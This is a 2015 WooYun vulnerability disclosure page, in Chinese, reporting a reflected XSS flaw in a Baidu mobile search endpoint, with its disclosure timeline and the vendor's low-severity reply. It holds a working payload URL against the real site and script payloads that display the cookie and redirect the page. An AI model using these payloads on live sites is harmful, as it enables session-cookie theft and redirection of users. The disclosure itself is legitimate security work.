当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133710

漏洞标题:百度某站过滤不严致xss触发

相关厂商:百度

漏洞作者: T-rex時沫

提交时间:2015-08-13 12:17

修复时间:2015-09-27 12:50

公开时间:2015-09-27 12:50

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

在Yun中飞翔时,无意中撞到http://www.wooyun.org/bugs/wooyun-2010-077722
脑洞大开,便找了个站测试下,应该不会撞洞吧。。。

详细说明:

某地:http://wapp.baidu.com/mo/q/searchpage
http://wapp.baidu.com/mo/q/m?word=%26lt%3Bscript%26gt%3Balert(document.cookie)%26lt%3B%2Fscript%26gt%3B&page_from_search=&tn6=bdISP&tn4=bdKSW&tn7=bdPSB&lm=16842752&lp=6093&sub4=%E8%BF%9B%E5%90%A7
首先是报cookie
<script>alert(document.cookie)</script>
然后是跳转
<script>document.location=" WooYun: 中国电信某分站问题(3)XSS "</script>

漏洞证明:

xss.jpg


然后跳转的同理,
过滤不严,

修复方案:

能力有限,找到这个位置xss

版权声明:转载请注明来源 T-rex時沫@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-13 12:49

厂商回复:

感谢关注,由于仅获取BauidID,危害较低

最新状态:

暂无